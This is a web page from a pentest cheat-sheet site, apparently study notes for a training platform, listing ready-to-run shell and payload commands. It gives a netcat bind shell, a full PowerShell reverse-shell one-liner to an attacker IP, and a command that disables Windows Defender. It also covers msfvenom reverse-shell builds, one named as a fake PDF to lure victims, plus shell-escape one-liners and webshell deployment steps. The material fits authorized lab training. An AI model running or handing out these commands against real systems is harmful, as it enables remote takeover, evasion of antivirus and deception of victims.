
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
      
        <link rel="prev" href="../../file-transfer/filetransfer/">
      
      
        <link rel="next" href="../../metasploit/metasploit/">
      
      
      <link rel="icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.37">
    
    
      
        <title>Shells & Payloads - Hacking Awesome CheatSheet</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.8c3ca2c6.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.06af60db.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
      <link rel="stylesheet" href="../../css/custom.css">
    
    <script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
    
  </head>
  
  
    
    
    
    
    
    <body dir="ltr" data-md-color-scheme="slate" data-md-color-primary="blue-grey" data-md-color-accent="green">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#bind-shells" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../.." title="Hacking Awesome CheatSheet" class="md-header__button md-logo" aria-label="Hacking Awesome CheatSheet" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            Hacking Awesome CheatSheet
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Shells & Payloads
            
          </span>
        </div>
      </div>
    </div>
    
      
    
    
    
    
      <label class="md-header__button md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    



<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="Hacking Awesome CheatSheet" class="md-nav__button md-logo" aria-label="Hacking Awesome CheatSheet" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    Hacking Awesome CheatSheet
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../.." class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Home
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" >
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Active Directory
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            Active Directory
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../active-directory/initial/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Initial
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../active-directory/adenumeration/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    AD Enumeration
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../active-directory/credentials/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Credentials Haunting
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../active-directory/lotl/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Living Off the Land
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../active-directory/acl/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    ACL Abuse Primer
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../active-directory/vulns/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Common Vulnerabilities
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../active-directory/trust/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Attacking Domain Trust
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../active-directory/ldap/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    LDAP
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../active-directory/lateralmovement/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Lateral Movement
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../active-directory/privilege/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Privilege Escalation
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../active-directory/bloodhound/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    BloodHound
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../active-directory/crtp/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    CRTP
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
        
          
          <label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Enumeration
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3">
            <span class="md-nav__icon md-icon"></span>
            Enumeration
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../enumeration/nmap/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Nmap
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../enumeration/enumeration/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Enumeration
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
        
          
          <label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Footprinting
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4">
            <span class="md-nav__icon md-icon"></span>
            Footprinting
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/domain-info/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Domain info
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/ftp/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    FTP
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/ssh/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    SSH
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/smtp/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    SMTP
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/dns/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    DNS
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/imap-pop3/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    IMAP/POP3
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/snmp/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    SNMP
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/ldap/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    LDAP
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/smb/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    SMB
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/mssql/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    MSSQL
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/mysql/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    MYSQL
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/nfs/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    NFS
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/rdp/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RDP
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/tns/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    ORACLE TNS
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/ipmi/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    IPMI
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/rsync/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RSYNC
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/rservices/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RSERVICES
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/winrm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    WinRM
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/mongodb/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    MongoDB
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../webinfogathering/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Web Information Gathering
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../file-transfer/filetransfer/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Files Transfer
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
    
  
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  <span class="md-ellipsis">
    Shells & Payloads
  </span>
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        
  
  <span class="md-ellipsis">
    Shells & Payloads
  </span>
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#bind-shells" class="md-nav__link">
    <span class="md-ellipsis">
      Bind Shells
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#reverse-shells" class="md-nav__link">
    <span class="md-ellipsis">
      Reverse Shells
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#payloads" class="md-nav__link">
    <span class="md-ellipsis">
      Payloads
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Payloads">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#crafting-payloads-with-msfvenom" class="md-nav__link">
    <span class="md-ellipsis">
      Crafting Payloads with MSFvenom
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#spawning-interactive-shells" class="md-nav__link">
    <span class="md-ellipsis">
      Spawning Interactive Shells
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#execution-permissions-considerations" class="md-nav__link">
    <span class="md-ellipsis">
      Execution Permissions Considerations
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#laudanum-one-webshell-to-rule-them-all" class="md-nav__link">
    <span class="md-ellipsis">
      Laudanum, One Webshell to Rule Them All
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#antak-webshell" class="md-nav__link">
    <span class="md-ellipsis">
      Antak Webshell
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../metasploit/metasploit/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Metasploit
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../pivoting/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Pivoting
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
        
          
          <label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Walkthrough
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_10">
            <span class="md-nav__icon md-icon"></span>
            Walkthrough
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../htb-academy/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    HTB Academy
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../htb-labs/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    HTB Labs
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../bash/bash_scripts/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Bash
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_12" >
        
          
          <label class="md-nav__link" for="__nav_12" id="__nav_12_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Blue
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_12_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_12">
            <span class="md-nav__icon md-icon"></span>
            Blue
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../blue/phising.md" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Phishing
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#bind-shells" class="md-nav__link">
    <span class="md-ellipsis">
      Bind Shells
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#reverse-shells" class="md-nav__link">
    <span class="md-ellipsis">
      Reverse Shells
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#payloads" class="md-nav__link">
    <span class="md-ellipsis">
      Payloads
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Payloads">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#crafting-payloads-with-msfvenom" class="md-nav__link">
    <span class="md-ellipsis">
      Crafting Payloads with MSFvenom
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#spawning-interactive-shells" class="md-nav__link">
    <span class="md-ellipsis">
      Spawning Interactive Shells
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#execution-permissions-considerations" class="md-nav__link">
    <span class="md-ellipsis">
      Execution Permissions Considerations
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#laudanum-one-webshell-to-rule-them-all" class="md-nav__link">
    <span class="md-ellipsis">
      Laudanum, One Webshell to Rule Them All
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#antak-webshell" class="md-nav__link">
    <span class="md-ellipsis">
      Antak Webshell
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
            <div class="md-content" data-md-component="content">
              <article class="md-content__inner md-typeset">
                
                  


  <h1>Shells & Payloads</h1>

<h2 id="bind-shells"><strong>Bind Shells</strong></h2>
<p>With a bind shell, the target system has a listener started and awaits a connection from a pentester's system (attack box).
1. Server - Binding a Bash shell to the TCP session: <code>rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2&gt;&amp;1 | nc -l 10.129.41.200 7777 &gt; /tmp/f</code>
2. Connecting to bind shell on target: <code>nc -nv 10.129.41.200 7777</code></p>
<h2 id="reverse-shells"><strong>Reverse Shells</strong></h2>
<p>With a reverse shell, the attack box will have a listener running, and the target will need to initiate the connection.
1. Server (attack box): <code>sudo nc -lvnp 443</code>
2. Client (target): <code>powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"</code>
3. If Windows Defeneder stopped comunnication: <code>Set-MpPreference -DisableRealtimeMonitoring $true</code></p>
<h2 id="payloads"><strong>Payloads</strong></h2>
<ol>
<li>Powershell One-liner: <code>powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"</code></li>
<li>Bash onliner: <code>rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2&gt;&amp;1 | nc -l 10.129.41.200 7777 &gt; /tmp/f</code></li>
</ol>
<h3 id="crafting-payloads-with-msfvenom"><strong>Crafting Payloads with MSFvenom</strong></h3>
<ol>
<li>List Payloads: <code>msfvenom -l payloads</code></li>
<li>Building A Stageless Payload for Linux: <code>msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf &gt; createbackup.elf</code></li>
<li>Building a simple Stageless Payload for a Windows system: <code>msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe &gt; BonusCompensationPlanpdf.exe</code></li>
</ol>
<h3 id="spawning-interactive-shells"><strong>Spawning Interactive Shells</strong></h3>
<ol>
<li><code>/bin/sh -i</code></li>
<li>Perl To Shell:<ol>
<li><code>perl —e 'exec "/bin/sh";'</code></li>
<li><code>perl: exec "/bin/sh";</code></li>
</ol>
</li>
<li>Ruby To Shell: <code>ruby: exec "/bin/sh"</code></li>
<li>Lua To Shell: <code>lua: os.execute('/bin/sh')</code></li>
<li>AWK To Shell: <code>awk 'BEGIN {system("/bin/sh")}'</code></li>
<li>Using Find For A Shell: <code>find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;</code></li>
<li>Using Exec To Launch A Shell: <code>find . -exec /bin/sh \; -quit</code></li>
<li>Vim To Shell: <code>vim -c ':!/bin/sh'</code></li>
</ol>
<h3 id="execution-permissions-considerations"><strong>Execution Permissions Considerations</strong></h3>
<p>Use <code>sudo -l</code> to find services you can run as root. Use <code>ls -la</code> to check permission.</p>
<h3 id="laudanum-one-webshell-to-rule-them-all"><strong>Laudanum, One Webshell to Rule Them All</strong></h3>
<ol>
<li><code>cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx</code></li>
</ol>
<h3 id="antak-webshell"><strong>Antak Webshell</strong></h3>
<ol>
<li><code>cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/administrator/Upload.aspx</code></li>
<li>Modify the Shell for Use (username and password)</li>
</ol>












                
              </article>
            </div>
          
          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    <script id="__config" type="application/json">{"base": "../..", "features": [], "search": "../../assets/javascripts/workers/search.6ce7567c.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
    
    
      <script src="../../assets/javascripts/bundle.d6f25eb3.min.js"></script>
      
    
  </body>
</html>